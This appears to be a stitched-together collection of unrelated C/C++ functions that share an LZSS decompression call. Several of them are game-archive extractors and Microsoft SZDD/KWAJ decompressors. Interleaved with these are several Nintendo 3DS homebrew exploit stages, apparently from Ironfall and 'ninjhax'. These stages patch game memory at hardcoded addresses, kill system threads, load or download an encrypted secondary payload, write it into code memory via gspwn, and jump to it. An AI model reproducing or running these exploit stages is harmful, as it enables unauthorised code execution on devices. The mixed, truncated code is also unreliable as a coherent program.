void _main()
{
Handle fileHandle = 0x0;
Result ret = 0x0;
u32 compressed_size = 0x0;
u8* compressed_buffer = LINEAR_BUFFER;
// load payload.bin from savegame
ret = _FSUSER_OpenFileDirectly(fsHandle, &fileHandle, 0x0, 0x00000004, PATH_EMPTY, "", 1, PATH_CHAR, "/payload.bin", 13, 0x1, 0x0);
if(ret)*(u32*)ret = 0xdead0001;
ret = _FSUSER_ReadFile(&fileHandle, &compressed_size, 0x0, compressed_buffer, 0xA000);
if(ret)*(u32*)ret = 0xdead0002;
u8* decompressed_buffer = &compressed_buffer[(compressed_size + 0xfff) & ~0xfff];
u32 decompressed_size = lzss_get_decompressed_size(compressed_buffer, compressed_size);
// decompress payload
ret = lzss_decompress(compressed_buffer, compressed_size, decompressed_buffer, decompressed_size);
// copy payload to text
ret = _GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)decompressed_buffer, decompressed_size);
ret = gspwn((void*)(IRON_CODE_LINEAR_BASE + 0x00101000 - 0x00100000), decompressed_buffer, (decompressed_size + 0x1f) & ~0x1f);
svc_sleepThread(300*1000*1000);
// ghetto dcache invalidation
// don't judge me
int i, j;//, k;
// for(k=0; k<0x2; k++)
for(j=0; j<0x4; j++)
for(i=0; i<0x01000000/0x4; i+=0x4)
LINEAR_BUFFER[i+j]^=0xDEADBABE;
// put framebuffers in linear mem so they're writable
u8* top_framebuffer = &LINEAR_BUFFER[0x00100000];
u8* low_framebuffer = &top_framebuffer[0x00046500];
_GSPGPU_SetBufferSwap(*gspHandle, 0, (GSP_FramebufferInfo){0, (u32*)top_framebuffer, (u32*)top_framebuffer, 240 * 3, (1<<8)|(1<<6)|1, 0, 0});
_GSPGPU_SetBufferSwap(*gspHandle, 1, (GSP_FramebufferInfo){0, (u32*)low_framebuffer, (u32*)low_framebuffer, 240 * 3, 1, 0, 0});
// un-init DSP so killing Ironfall will work
_DSP_UnloadComponent(dspHandle);
_DSP_RegisterInterruptEvents(dspHandle, 0x0, 0x2, 0x2);
// run payload
{
void (*payload)(u32* paramlk, u32* stack_pointer) = (void*)0x00101000;
u32* paramblk = (u32*)LINEAR_BUFFER;
paramblk[0x1c >> 2] = IRON_GSPGPU_GXCMD4;
paramblk[0x20 >> 2] = IRON_GSPGPU_FLUSHDATACACHE_WRAPPER;
paramblk[0x48 >> 2] = 0x8d; // flags
paramblk[0x58 >> 2] = IRON_GSPGPU_HANDLE;
paramblk[0x64 >> 2] = 0x08010000;
payload(paramblk, (u32*)(0x10000000 - 4));
}
*(u32*)ret = 0xdead0008;
}
/* 封包资源提取函数 */
static int ADVDX_pak_extract_resource(struct package *pkg,
struct package_resource *pkg_res)
{
BYTE *compr, *uncompr;
DWORD comprlen, uncomprlen;
comprlen = pkg_res->raw_data_length;
compr = (BYTE *)malloc(comprlen);
if (ADVDX_readvec(pkg, compr, comprlen, pkg_res->offset, IO_SEEK_SET)) {
free(compr);
return -CUI_EREADVECONLY;
}
if (pkg_res->flags & PKG_RES_FLAG_RAW) {
pkg_res->raw_data = compr;
return 0;
}
if (!strncmp((char *)compr, "_BMD", 4)) { /* type2 */
bmd_header_t *bmd = (bmd_header_t *)compr;
uncomprlen = bmd->width * bmd->height * 4;
uncompr = (BYTE *)malloc(uncomprlen);
if (!uncompr) {
free(compr);
return -CUI_EMEM;
}
lzss_decompress(uncompr, uncomprlen, compr + sizeof(*bmd), bmd->length);
if (MySaveAsBMP(uncompr, uncomprlen, NULL, 0, bmd->width, 0 - bmd->height, 32, 0,
(BYTE **)&pkg_res->actual_data, &pkg_res->actual_data_length, my_malloc)) {
free(uncompr);
free(compr);
return -CUI_EMEM;
}
free(uncompr);
pkg_res->flags |= PKG_RES_FLAG_APEXT;
pkg_res->replace_extension = _T(".bmp");
}
pkg_res->raw_data = compr;
return 0;
}
std::unique_ptr<Image> AnimParser::ParseFrame0804(uint8_t frame_width, uint8_t frame_height)
{
frame_width = align_to_n(frame_width, 4);
const uint8_t* newptr = ptr;
uint32_t newsize = size;
std::vector<uint8_t> decompressed_data = lzss_decompress(ptr, size, &newptr, &newsize);
uint32_t compressed_size = size - newsize;
ptr = newptr + (align_to_n(compressed_size, 4) - compressed_size);
size = newsize - (align_to_n(compressed_size, 4) - compressed_size);
std::unique_ptr<Image> image(new Image(frame_width, frame_height));
uint32_t* pixels = (uint32_t*)image->GetData();
for (int i = 0; i < frame_width * frame_height; ++i) {
*pixels++ = palette.at(decompressed_data.at(i));
}
return image;
}
static int ipac_decompress_iel1(iel1_header_t *iel1, DWORD iel1_len,
BYTE **ret_buf, DWORD *ret_len)
{
BYTE *uncompr, *compr;
DWORD uncomprLen, comprLen, actlen;
uncomprLen = iel1->length;
uncompr = (BYTE *)malloc(uncomprLen);
if (!uncompr)
return -1;
compr = (BYTE *)(iel1 + 1);
comprLen = iel1_len - sizeof(*iel1);
actlen = lzss_decompress(uncompr, uncomprLen, compr, comprLen);
if (actlen != uncomprLen) {
free(uncompr);
return -1;
}
*ret_buf = uncompr;
*ret_len = actlen;
return 0;
}
/***************************************
* SZDDD_EXTRACT
***************************************
* decompresses an SZDD file
*/
static int szddd_extract(struct msszdd_decompressor *base,
struct msszddd_header *hdr, const char *filename)
{
struct msszdd_decompressor_p *self = (struct msszdd_decompressor_p *) base;
struct mspack_file *fh, *outfh;
struct mspack_system *sys;
off_t data_offset;
if (!self) return MSPACK_ERR_ARGS;
if (!hdr) return self->error = MSPACK_ERR_ARGS;
sys = self->system;
fh = ((struct msszddd_header_p *) hdr)->fh;
/* seek to the compressed data */
data_offset = (hdr->format == MSSZDD_FMT_NORMAL) ? 14 : 12;
if (sys->seek(fh, data_offset, MSPACK_SYS_SEEK_START)) {
return self->error = MSPACK_ERR_SEEK;
}
/* open file for output */
if (!(outfh = sys->open(sys, filename, MSPACK_SYS_OPEN_WRITE))) {
return self->error = MSPACK_ERR_OPEN;
}
/* decompress the data */
self->error = lzss_decompress(sys, fh, outfh, SZDD_INPUT_SIZE,
hdr->format == MSSZDD_FMT_NORMAL
? LZSS_MODE_EXPAND
: LZSS_MODE_QBASIC);
/* close output file */
sys->close(outfh);
return self->error;
}
void exefs_save(exefs_context* ctx, u32 index, u32 flags)
{
exefs_sectionheader* section = (exefs_sectionheader*)(ctx->header.section + index);
char outfname[MAX_PATH];
char name[64];
u32 offset;
u32 size;
FILE* fout;
u32 compressedsize = 0;
u32 decompressedsize = 0;
u8* compressedbuffer = 0;
u8* decompressedbuffer = 0;
filepath* dirpath = 0;
offset = getle32(section->offset) + sizeof(exefs_header);
size = getle32(section->size);
dirpath = settings_get_exefs_dir_path(ctx->usersettings);
if (size == 0 || dirpath == 0 || dirpath->valid == 0)
return;
if (size >= ctx->size)
{
fprintf(stderr, "Error, ExeFS section %d size invalid\n", index);
return;
}
memset(name, 0, sizeof(name));
memcpy(name, section->name, 8);
memcpy(outfname, dirpath->pathname, MAX_PATH);
strcat(outfname, "/");
if (name[0] == '.')
strcat(outfname, name+1);
else
strcat(outfname, name);
strcat(outfname, ".bin");
fout = fopen(outfname, "wb");
if (fout == 0)
{
fprintf(stderr, "Error, failed to create file %s\n", outfname);
goto clean;
}
fseek(ctx->file, ctx->offset + offset, SEEK_SET);
ctr_init_counter(&ctx->aes, ctx->key, ctx->counter);
ctr_add_counter(&ctx->aes, offset / 0x10);
if (index == 0 && (ctx->compressedflag || (flags & CompressCodeFlag)) && ((flags & RawFlag) == 0))
{
fprintf(stdout, "Decompressing section %s to %s...\n", name, outfname);
compressedsize = size;
compressedbuffer = malloc(compressedsize);
if (compressedbuffer == 0)
{
fprintf(stdout, "Error allocating memory\n");
goto clean;
}
if (compressedsize != fread(compressedbuffer, 1, compressedsize, ctx->file))
{
fprintf(stdout, "Error reading input file\n");
goto clean;
}
if (ctx->encrypted)
ctr_crypt_counter(&ctx->aes, compressedbuffer, compressedbuffer, compressedsize);
decompressedsize = lzss_get_decompressed_size(compressedbuffer, compressedsize);
decompressedbuffer = malloc(decompressedsize);
if (decompressedbuffer == 0)
{
fprintf(stdout, "Error allocating memory\n");
goto clean;
}
if (0 == lzss_decompress(compressedbuffer, compressedsize, decompressedbuffer, decompressedsize))
goto clean;
if (decompressedsize != fwrite(decompressedbuffer, 1, decompressedsize, fout))
{
fprintf(stdout, "Error writing output file\n");
goto clean;
}
}
else
{
u8 buffer[16 * 1024];
fprintf(stdout, "Saving section %s to %s...\n", name, outfname);
while(size)
{
u32 max = sizeof(buffer);
if (max > size)
max = size;
if (max != fread(buffer, 1, max, ctx->file))
{
fprintf(stdout, "Error reading input file\n");
goto clean;
}
if (ctx->encrypted)
ctr_crypt_counter(&ctx->aes, buffer, buffer, max);
if (max != fwrite(buffer, 1, max, fout))
{
fprintf(stdout, "Error writing output file\n");
goto clean;
}
size -= max;
}
}
clean:
free(compressedbuffer);
free(decompressedbuffer);
return;
}
int _main()
{
Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
// drawString(CN_TOPFBADR1,"ninjhaxx",0,0);
// drawString(CN_TOPFBADR2,"ninjhaxx",0,0);
Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
int line=10;
Result ret;
Handle* addressArbiterHandle=(Handle*)0x334960;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002BA368;
Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002AED20;
Handle** dspHandle=(Handle**)0x334EFC;
_DSP_UnloadComponent(*dspHandle);
_DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x356208+0x10+4*0x4))=0x002ABEDC; //svc 0x9 addr
//patch waitSyncN
patchMem(gspHandle, computeCodeAddress(0x00192200), 0x200, 0x19, 0x4F);
patchMem(gspHandle, computeCodeAddress(0x00192600), 0x200, 0x7, 0x13);
patchMem(gspHandle, computeCodeAddress(0x001CA200), 0x200, 0xB, 0x1E);
// patchMem(gspHandle, computeCodeAddress(0x000C6100), 0x200, 0x3C, 0x52);
//patch arbitrateAddress
patchMem(gspHandle, computeCodeAddress(0x001C9E00), 0x200, 0x14, 0x40);
//wake threads
svc_arbitrateAddress(*addressArbiterHandle, 0x35811c, 0, -1, 0);
svc_signalEvent(((Handle*)0x3480d0)[2]);
s32 out; svc_releaseSemaphore(&out, *(Handle*)0x357490, 1);
//kill thread5 without panicking the kernel...
*(u8*)0x359935=0x00;
svc_sleepThread(0x10000000);
//load secondary payload
u32 secondaryPayloadSize;
{
Result ret;
Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR;
FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}};
//write secondary payload file
Handle fileHandle;
ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE);
if(ret)*(u32*)NULL=0xC0DF0002;
ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14300000, 0x00011000);
if(ret)*(u32*)NULL=0xC0DF0003;
ret=_FSFILE_Close(fileHandle);
if(ret)*(u32*)NULL=0xC0DF0004;
}
//decompress it
{
lzss_decompress((u8*)0x14300000, secondaryPayloadSize, (u8*)0x14100000, lzss_get_decompressed_size((u8*)0x14300000, secondaryPayloadSize));
}
ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000);
doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000);
svc_sleepThread(0x3B9ACA00);
// //close thread handles
// ret=svc_closeHandle(*((Handle*)0x359938));
// ret=svc_closeHandle(*((Handle*)0x34FEA4));
// ret=svc_closeHandle(*((Handle*)0x356274));
// ret=svc_closeHandle(*((Handle*)0x334730));
// ret=svc_closeHandle(*((Handle*)0x334F64));
void (*reset)(int size)=(void*)CN_3DSX_LOADADR;
reset(0);
while(1);
return 0;
}
/***************************************
* KWAJD_EXTRACT
***************************************
* decompresses a KWAJ file
*/
static int kwajd_extract(struct mskwaj_decompressor *base,
struct mskwajd_header *hdr, const char *filename)
{
struct mskwaj_decompressor_p *self = (struct mskwaj_decompressor_p *) base;
struct mspack_system *sys;
struct mspack_file *fh, *outfh;
if (!self) return MSPACK_ERR_ARGS;
if (!hdr) return self->error = MSPACK_ERR_ARGS;
sys = self->system;
fh = ((struct mskwajd_header_p *) hdr)->fh;
/* seek to the compressed data */
if (sys->seek(fh, hdr->data_offset, MSPACK_SYS_SEEK_START)) {
return self->error = MSPACK_ERR_SEEK;
}
/* open file for output */
if (!(outfh = sys->open(sys, filename, MSPACK_SYS_OPEN_WRITE))) {
return self->error = MSPACK_ERR_OPEN;
}
self->error = MSPACK_ERR_OK;
/* decompress based on format */
if (hdr->comp_type == MSKWAJ_COMP_NONE ||
hdr->comp_type == MSKWAJ_COMP_XOR)
{
/* NONE is a straight copy. XOR is a copy xored with 0xFF */
unsigned char *buf = (unsigned char *) sys->alloc(sys, (size_t) KWAJ_INPUT_SIZE);
if (buf) {
int read, i;
while ((read = sys->read(fh, buf, KWAJ_INPUT_SIZE)) > 0) {
if (hdr->comp_type == MSKWAJ_COMP_XOR) {
for (i = 0; i < read; i++) buf[i] ^= 0xFF;
}
if (sys->write(outfh, buf, read) != read) {
self->error = MSPACK_ERR_WRITE;
break;
}
}
if (read < 0) self->error = MSPACK_ERR_READ;
sys->free(buf);
}
else {
self->error = MSPACK_ERR_NOMEMORY;
}
}
else if (hdr->comp_type == MSKWAJ_COMP_SZDD) {
self->error = lzss_decompress(sys, fh, outfh, KWAJ_INPUT_SIZE,
LZSS_MODE_EXPAND);
}
else if (hdr->comp_type == MSKWAJ_COMP_LZH) {
struct kwajd_stream *lzh = lzh_init(sys, fh, outfh);
self->error = (lzh) ? lzh_decompress(lzh) : MSPACK_ERR_NOMEMORY;
lzh_free(lzh);
}
else {
self->error = MSPACK_ERR_DATAFORMAT;
}
/* close output file */
sys->close(outfh);
return self->error;
}
int _main()
{
Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
paintScreen(0x00,0x00,0x00);
// drawString((u8*)CN_TOPFBADR1,"ninjhaxx",0,0);
// drawString((u8*)CN_TOPFBADR2,"ninjhaxx",0,0);
int line=10;
Result ret;
Handle* addressArbiterHandle=(Handle*)0x003414B0;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78;
Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002B8B24;
Handle** dspHandle=(Handle**)0x341A4C;
_DSP_UnloadComponent(*dspHandle);
_DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr
//patch waitSyncN
patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41);
patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45);
patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A);
// patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44);
// patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31);
//patch arbitrateAddress
patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C);
//wake threads
svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0);
svc_signalEvent(((Handle*)0x354ba8)[2]);
s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK !
//kill thread5 without panicking the kernel...
*(u8*)(0x3664D8+0xd)=0x00;
//load secondary payload
u32 secondaryPayloadSize;
{
Result ret;
Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR;
FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}};
//read secondary payload file
Handle fileHandle;
ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE);
if(ret)*(u32*)NULL=0xC0DF0002;
ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14300000, 0x00011000);
if(ret)*(u32*)NULL=0xC0DF0003;
ret=_FSFILE_Close(fileHandle);
if(ret)*(u32*)NULL=0xC0DF0004;
}
//decompress it
{
lzss_decompress((u8*)0x14300000, secondaryPayloadSize, (u8*)0x14100000, lzss_get_decompressed_size((u8*)0x14300000, secondaryPayloadSize));
}
ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x300000);
doGspwn((u32*)(0x14100000), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000);
svc_sleepThread(0x3B9ACA00);
void (*reset)(int size)=(void*)CN_3DSX_LOADADR;
reset(0);
while(1);
return 0;
}
static int RAGE_Pac_extract_resource(struct package *pkg,
struct package_resource *pkg_res)
{
BYTE *compr, *uncompr;
DWORD comprlen, uncomprlen;
comprlen = pkg_res->raw_data_length;
compr = (BYTE *)malloc(comprlen);
if (!compr)
return -CUI_EMEM;
if (pkg->pio->readvec(pkg, compr, comprlen, pkg_res->offset, IO_SEEK_SET)) {
free(compr);
return -CUI_EREADVEC;
}
if (!strncmp((char *)compr, "CMP1", 4)) {
CMP_header_t *cmp_header = (CMP_header_t *)compr;
uncomprlen = cmp_header->uncomprlen;
uncompr = (BYTE *)malloc(uncomprlen);
if (!uncompr) {
free(compr);
return -CUI_EMEM;
}
lzss_decompress(uncompr, uncomprlen, (BYTE *)(cmp_header + 1), cmp_header->comprlen);
if (!strncmp((char *)uncompr, "SCR1", 4)) {
pkg_res->flags |= PKG_RES_FLAG_REEXT;
pkg_res->replace_extension = _T(".scr");
} else if (!strncmp((char *)uncompr, "BM", 2)) {
BITMAPFILEHEADER *bmfh;
BITMAPINFOHEADER *bmiHeader;
DWORD line_len, act_line_len;
/* TODO line len align */
bmfh = (BITMAPFILEHEADER *)uncompr;
bmiHeader = (BITMAPINFOHEADER *)(bmfh + 1);
line_len = bmiHeader->biWidth * bmiHeader->biBitCount / 8;
act_line_len = (act_line_len + 3) & ~3;
if (line_len != act_line_len) {
BYTE *rgb = (BYTE *)(bmiHeader + 1);
BYTE *act_uncompr, *palette;
DWORD rgb_len, act_uncomprlen, palette_length;
if (bmiHeader->biBitCount <= 8) {
palette = rgb;
palette_length = 0x400;
rgb += palette_length;
} else {
palette = NULL;
palette_length = 0;
}
rgb_len = line_len * bmiHeader->biHeight;
if (MyBuildBMPFile(rgb, rgb_len, palette, palette_length, bmiHeader->biWidth,
bmiHeader->biHeight, bmiHeader->biBitCount, &act_uncompr, &act_uncomprlen, my_malloc)) {
free(uncompr);
free(compr);
return -CUI_EMEM;
}
free(uncompr);
uncompr = act_uncompr;
uncomprlen = act_uncomprlen;
}
pkg_res->flags |= PKG_RES_FLAG_REEXT;
pkg_res->replace_extension = _T(".bmp");
}
} else {
uncompr = NULL;
uncomprlen = 0;
}
pkg_res->raw_data = compr;
pkg_res->actual_data = uncompr;
pkg_res->actual_data_length = uncomprlen;
return 0;
}
/* 封包资源提取函数 */
static int RPM_ADV_SYSTEM_arc_extract_resource(struct package *pkg,
struct package_resource *pkg_res)
{
u32 is_compressed;
BYTE *uncompr, *compr, *actdata;
DWORD actlen;
is_compressed = (u32)package_get_private(pkg);
compr = (BYTE *)malloc(pkg_res->raw_data_length);
if (!compr)
return -CUI_EMEM;
if (pkg->pio->readvec(pkg, compr, pkg_res->raw_data_length, pkg_res->offset, IO_SEEK_SET)) {
free(compr);
return -CUI_EREADVEC;
}
if (is_compressed) {
uncompr = (BYTE *)malloc(pkg_res->actual_data_length);
if (!uncompr) {
free(compr);
return -CUI_EMEM;
}
actlen = pkg_res->actual_data_length;
lzss_decompress(uncompr, &actlen, compr, pkg_res->raw_data_length);
if (actlen != pkg_res->actual_data_length) {
free(uncompr);
free(compr);
return -CUI_EUNCOMPR;
}
free(compr);
compr = NULL;
actdata = uncompr;
} else {
uncompr = NULL;
actlen = pkg_res->raw_data_length;
actdata = compr;
}
/* 对于较长的资源名称,后缀名有时候会被揭短 */
if (!strncmp((char *)actdata, "BM", 2)) {
BITMAPFILEHEADER *bmfh = (BITMAPFILEHEADER *)actdata;
BITMAPINFOHEADER *bmif = (BITMAPINFOHEADER *)(bmfh + 1);
if (bmif->biBitCount == 24) {
DWORD bmp32_size = bmif->biWidth * bmif->biHeight * 4
+ sizeof(BITMAPINFOHEADER) + sizeof(BITMAPFILEHEADER) + 2;
DWORD bmp24_size = ((bmif->biWidth * 3 + 3) & ~3) * 3
+ sizeof(BITMAPINFOHEADER) + sizeof(BITMAPFILEHEADER) + 2;
if (bmp24_size > actlen && bmp32_size >= actlen) {
DWORD rgba_size = bmif->biWidth * bmif->biHeight * 4;
BYTE *rgba = new BYTE[rgba_size];
if (!rgba) {
free(actdata);
return -CUI_EMEM;
}
DWORD align = (4 - ((bmif->biWidth * 3) & 3)) & 3;
BYTE *src = actdata + bmfh->bfOffBits;
BYTE *dst = rgba;
BYTE *a = actdata + bmfh->bfSize;
for (int y = 0; y < bmif->biHeight; ++y) {
for (int x = 0; x < bmif->biWidth; ++x) {
*dst++ = *src++;
*dst++ = *src++;
*dst++ = *src++;
*dst++ = *a++;
}
src += align;
}
BYTE *ret;
DWORD ret_size;
if (MyBuildBMPFile(rgba, rgba_size, NULL, 0, bmif->biWidth,
bmif->biHeight, 32, &ret, &ret_size, my_malloc)) {
delete [] rgba;
delete [] actdata;
return -CUI_EMEM;
}
delete [] rgba;
delete [] actdata;
uncompr = ret;
pkg_res->actual_data_length = ret_size;
}
}
pkg_res->flags |= PKG_RES_FLAG_REEXT;
pkg_res->replace_extension = _T(".BMP");
}
if (strstr(pkg_res->name, ".lib")) {
const char *key = "偰偡偲"; // てすと
for (DWORD i = 0, k = 0; i < actlen; i++) {
actdata[i] -= key[k++];
if (k <= strlen(key))
k = 0;
}
}
pkg_res->raw_data = compr;
pkg_res->actual_data = uncompr;
return 0;
}
int _main()
{
Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
for(int i=0; i<0x46500*2;i++)((u8*)CN_TOPFBADR1)[i]=0x00;
// drawString(TOPFBADR1,"ninjhaxx",0,0);
// drawString(TOPFBADR2,"ninjhaxx",0,0);
Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
int line=10;
Result ret;
Handle* addressArbiterHandle=(Handle*)0x003414B0;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78;
Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002B8B24;
Handle** dspHandle=(Handle**)0x341A4C;
_DSP_UnloadComponent(*dspHandle);
_DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr
//patch waitSyncN
patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41);
patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45);
patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A);
// patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44);
// patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31);
//patch arbitrateAddress
patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C);
//wake threads
svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0);
svc_signalEvent(((Handle*)0x354ba8)[2]);
s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK !
//kill thread5 without panicking the kernel...
*(u8*)(0x3664D8+0xd)=0x00;
svc_sleepThread(0x10000000);
Handle httpcHandle;
ret=_srv_getServiceHandle(srvHandle, &httpcHandle, "http:C");
// drawHex(ret,0,line+=10);
// drawHex(httpcHandle,0,line+=10);
Handle httpContextHandle=0x00;
ret=HTTPC_Initialize(httpcHandle);
// drawHex(ret,0,line+=10);
ret=HTTPC_CreateContext(httpcHandle, CN_NINJHAX_URL OUTNAME ".bin", &httpContextHandle);
// drawHex(ret,0,line+=10);
Handle httpcHandle2;
ret=_srv_getServiceHandle(srvHandle, &httpcHandle2, "http:C");
ret=HTTPC_InitializeConnectionSession(httpcHandle2, httpContextHandle);
ret=HTTPC_SetProxyDefault(httpcHandle2, httpContextHandle);
// drawHex(ret,0,line+=10);
ret=HTTPC_BeginRequest(httpcHandle2, httpContextHandle);
// drawHex(ret,0,line+=10);
u8* buffer0=(u8*)0x14100000;
u8* buffer1=(u8*)0x14300000;
u32 secondaryPayloadSize=0x0;
ret=HTTPC_ReceiveData(httpcHandle2, httpContextHandle, buffer0, 0x300000);
ret=HTTPC_GetDownloadSizeState(httpcHandle2, httpContextHandle, &secondaryPayloadSize);
// drawHex(ret,0,line+=10);
HTTPC_CloseContext(httpcHandle2, httpContextHandle);
//TODO : modify key/parray first ?
//(use some of its slots as variables in ROP to confuse people ?)
//decrypt secondary payload
Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A5900;
Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A5F48;
blowfishKeyScheduler((u32*)0x14200000);
blowfishDecrypt((u32*)0x14200000, (u32*)buffer0, (u32*)buffer1, secondaryPayloadSize);
while(!*(u32*)(&buffer1[secondaryPayloadSize-4]))secondaryPayloadSize-=4;
lzss_decompress(buffer1, secondaryPayloadSize, buffer0, lzss_get_decompressed_size(buffer1, secondaryPayloadSize));
ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)buffer0, 0x300000);
// drawHex(ret,0,line+=10);
doGspwn((u32*)(buffer0), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000C000);
svc_sleepThread(0x3B9ACA00);
// drawString(TOPFBADR1,"ninjhax2",100,0);
// drawString(TOPFBADR2,"ninjhax2",100,0);
void (*reset)(u32 size)=(void*)CN_3DSX_LOADADR;
reset(secondaryPayloadSize);
return 0;
}
int _main()
{
Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
// drawString(CN_TOPFBADR1,"ninjhaxx",0,0);
// drawString(CN_TOPFBADR2,"ninjhaxx",0,0);
Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
int line=10;
Result ret;
#ifdef CN_WEST
Handle* addressArbiterHandle=(Handle*)0x334960;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002BA368;
Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002AED20;
Handle** dspHandle=(Handle**)0x334EFC;
_DSP_UnloadComponent(*dspHandle);
_DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x356208+0x10+4*0x4))=0x002ABEDC; //svc 0x9 addr
// //patch waitSyncN
// patchMem(gspHandle, computeCodeAddress(0x00192200), 0x200, 0x19, 0x4F);
// patchMem(gspHandle, computeCodeAddress(0x00192600), 0x200, 0x7, 0x13);
// patchMem(gspHandle, computeCodeAddress(0x001CA200), 0x200, 0xB, 0x1E);
// // patchMem(gspHandle, computeCodeAddress(0x000C6100), 0x200, 0x3C, 0x52);
// //patch arbitrateAddress
// patchMem(gspHandle, computeCodeAddress(0x001C9E00), 0x200, 0x14, 0x40);
// //wake threads
// svc_arbitrateAddress(*addressArbiterHandle, 0x35811c, 0, -1, 0);
// svc_signalEvent(((Handle*)0x3480d0)[2]);
// s32 out; svc_releaseSemaphore(&out, *(Handle*)0x357490, 1);
//kill thread5 without panicking the kernel...
*(u8*)0x359935=0x00;
#else
Handle* addressArbiterHandle=(Handle*)0x003414B0;
Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78;
Result (*_DSP_RegisterInterruptEvents)(Handle* handle, Handle event, u32 param0, u32 param1)=(void*)0x002B8B24;
Handle** dspHandle=(Handle**)0x341A4C;
_DSP_UnloadComponent(*dspHandle);
_DSP_RegisterInterruptEvents(*dspHandle, 0x0, 0x2, 0x2);
//close threads
//patch gsp event handler addr to kill gsp thread ASAP
*((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr
// //patch waitSyncN
// patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41);
// patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45);
// patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A);
// // patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44);
